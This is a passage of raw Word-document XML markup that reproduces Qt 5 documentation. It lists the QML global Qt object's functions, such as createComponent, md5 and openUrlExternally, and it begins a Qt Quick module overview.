          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1278" w:name="dynamic-object-creation"/>
      <w:bookmarkStart w:id="1279" w:name="_Toc483000798"/>
      <w:bookmarkStart w:id="1280" w:name="_Toc483003796"/>
      <w:bookmarkStart w:id="1281" w:name="_Toc483604150"/>
      <w:bookmarkStart w:id="1282" w:name="_Toc483605370"/>
      <w:bookmarkEnd w:id="1278"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic Object Creation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1279"/>
      <w:bookmarkEnd w:id="1280"/>
      <w:bookmarkEnd w:id="1281"/>
      <w:bookmarkEnd w:id="1282"/>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following functions on the global object allow you to dynamically create QML items from files or strings. See</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1555" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic QML Object Creation from JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for an overview of their use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1556" w:anchor="createComponent-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve">object </w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.createComponent(url)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1557" w:anchor="createQmlObject-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object Qt.createQmlObject(string qml, object parent, string filepath)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="002736BE" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1283" w:name="other-functions"/>
      <w:bookmarkStart w:id="1284" w:name="_Toc483000799"/>
      <w:bookmarkStart w:id="1285" w:name="_Toc483003797"/>
      <w:bookmarkStart w:id="1286" w:name="_Toc483604151"/>
      <w:bookmarkStart w:id="1287" w:name="_Toc483605371"/>
      <w:bookmarkEnd w:id="1283"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Other Functions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1284"/>
      <w:bookmarkEnd w:id="1285"/>
      <w:bookmarkEnd w:id="1286"/>
      <w:bookmarkEnd w:id="1287"/>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following functions are also on the Qt object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1558" w:anchor="quit-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.quit()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1559" w:anchor="md5-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.md5(string)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1560" w:anchor="btoa-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>string Qt.btoa(string)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1561" w:anchor="atob-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>string Qt.atob(string)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="000821BB" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1562" w:anchor="binding-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="000821BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="262626"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>object Qt.binding(function)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1563" w:anchor="locale-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>object Qt.locale()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1564" w:anchor="resolvedUrl-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>string Qt.resolvedUrl(string)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1565" w:anchor="openUrlExternally-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.openUrlExternally(string)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E96ACF" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1566" w:anchor="fontFamilies-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>list&lt;string&gt; Qt.fontFamilies()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="00D815C8" w:rsidRDefault="008C71BA" w:rsidP="00E96ACF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00C407A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId1567" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="1288" w:name="_Toc382058610"/>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1289" w:name="_Toc483000801"/>
      <w:bookmarkStart w:id="1290" w:name="_Toc483003799"/>
      <w:bookmarkStart w:id="1291" w:name="_Toc483604152"/>
      <w:bookmarkStart w:id="1292" w:name="_Toc483605372"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1289"/>
      <w:bookmarkEnd w:id="1290"/>
      <w:bookmarkEnd w:id="1291"/>
      <w:bookmarkEnd w:id="1292"/>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick module is the standard library for writing QML applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. While the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1568" w:history="1">
        <w:r w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>language infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the basic types necessary for creating user interfaces with QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual canvas</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>includes types for creating and animating visual components, receiving user input, creating data models and views and delayed object instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
